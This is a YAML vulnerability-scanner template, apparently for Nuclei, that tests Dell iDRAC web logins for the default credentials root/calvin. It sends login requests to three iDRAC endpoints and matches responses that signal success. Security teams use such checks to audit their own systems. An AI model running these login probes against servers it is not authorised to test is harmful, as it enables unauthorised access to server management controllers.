id: poc-yaml-dell-idarc-default-password

info:
  name: poc-yaml-dell-idarc-default-password
  author: Aurora
  severity: medium
  tags: xray-converted,ct-456768
  reference:
    - https://www.delltechnologies.com/en-us/solutions/openmanage/idrac.htm

http:
  - raw:
      - |
        POST /data/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user=root&password=calvin

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "<forwardUrl>"
          - "The maximum number of user sessions has been reached!"
      - type: regex
        part: body
        regex:
          - "<authResult>[0|5]</authResult>"
  - raw:
      - |
        POST /cgi-bin/webcgi/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user=root&password=calvin&WEBSERVER_timeout=1800&WEBSERVER_timeout_select=1800

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "/cgi-bin/webcgi/index"
          - "Connection refused, maximum sessions already in use"
  - raw:
      - |
        POST /Applications/dellUI/RPC/WEBSES/create.asp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        WEBVAR_USERNAME=root&WEBVAR_PASSWORD=calvin&WEBVAR_ISCMCLOGIN=0

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "Failure_No_Free_Slot"